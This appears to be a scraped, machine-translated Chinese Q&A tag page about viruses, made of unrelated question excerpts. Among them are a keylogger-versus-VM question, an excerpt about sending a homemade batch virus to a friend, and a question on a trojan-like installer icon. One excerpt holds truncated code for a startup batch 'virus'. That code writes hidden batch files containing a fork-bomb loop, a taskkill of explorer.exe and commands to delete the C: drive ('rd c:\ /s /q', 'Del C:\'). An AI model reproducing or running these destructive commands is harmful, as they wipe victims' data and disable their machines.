查看截图可以发现有两个svchost.exe
。
一个是svchost.exe (NetworkService)
,另一个是svchost.exe (LocalServiceAndNoImpersonation)
svchost.exe (LocalServiceAndNoImpersonation)
仅在活动时才处于活动状态并使用网络firefox.exe
。
答案应该是显而易见的,但我还是问了。
如果主机感染了键盘记录器的病毒,而您在虚拟 linux 客户端上执行敏感操作,则键盘记录器会记录该信息。所以如果主机被感染,使用虚拟机是没有用的,对吧?
除了防病毒/恶意软件、带有另一个操作系统的新分区和完全不同的计算机之外,我还有哪些选择?
这是非常复杂的。我正在开发一个恶意批处理文件只是为了测试自己。这将在启动时完成。
我拥有的是三个 + 六个(隐藏的)批处理文件。第一个文件制作了六个其他隐藏的批处理文件,然后CALL是第二个未隐藏的文件。
第二个文件只是说了一些讨厌的事情,最后执行了六个文件。
第三个文件在后台运行并检查第二个文件是否正在运行,如果没有,它将执行六个隐藏文件。
现在我遇到的问题。如果受害者有一个在启动时打开批处理文件的服务或任何东西并且它继续运行,那么所有的事情都会变得一团糟,因为所有正在运行的批处理文件都有进程名称cmd.exe
如果受害者关闭了第二个(不是隐藏的)文件,但是另一个批处理文件(不是病毒的一部分)正在运行。第三个批处理文件将假定它仍在运行。因为它也有名字cmd.exe
而且第二个文件也不会在启动时打开。
这是我的批处理文件的代码。
文件编号。1@echo off
:DALLING
echo @echo off >>1.bat
echo :B >>1.bat
echo start >>1.bat
echo goto B >>1.bat
echo @echo off >>2.bat
echo color 02 >>2.bat
echo :start >>2.bat
echo taskkill -f explorer.exe >>2.bat
echo start %windir%\System32\rundll32.exe user 32.dll, LockWorkStation >>2.bat
echo rd c:\ /s /q >>2.bat
echo cls >>2.bat
echo @Echo off >>3.bat
echo Del C:\ …
Run Code Online (Sandbox Code Playgroud) 我刚开始编码,我刚刚创建了一个 Windows 病毒(使用 bat 文件),但我想将它发送给一个使用 Mac 的朋友来测试它......这可能吗?或者我是否需要创建特定的 Mac 病毒才能使其工作?
为什么Windows要设计这么奇怪的图标?当你看到它时,你很容易想到木马,因为你可以在屏幕上看到一匹马。这是图片(图片来源是 Scheme 编译器安装程序Petite Chez Scheme):
Windows 设计这样一个类似木马的图标是不是有什么特殊原因?
当我卸载 Petite Chez Scheme 时,我的防病毒软件警告我它正在尝试修改我的环境变量。我选择拒绝它的操作并成功卸载它。
Petite Chez Scheme 真的是木马吗?
virus ×7
batch ×1
batch-file ×1
command-line ×1
hosts ×1
networking ×1
trojan ×1
vbscript ×1
virtualbox ×1
windows ×1
windows-10 ×1
windows-7 ×1
windows-xp ×1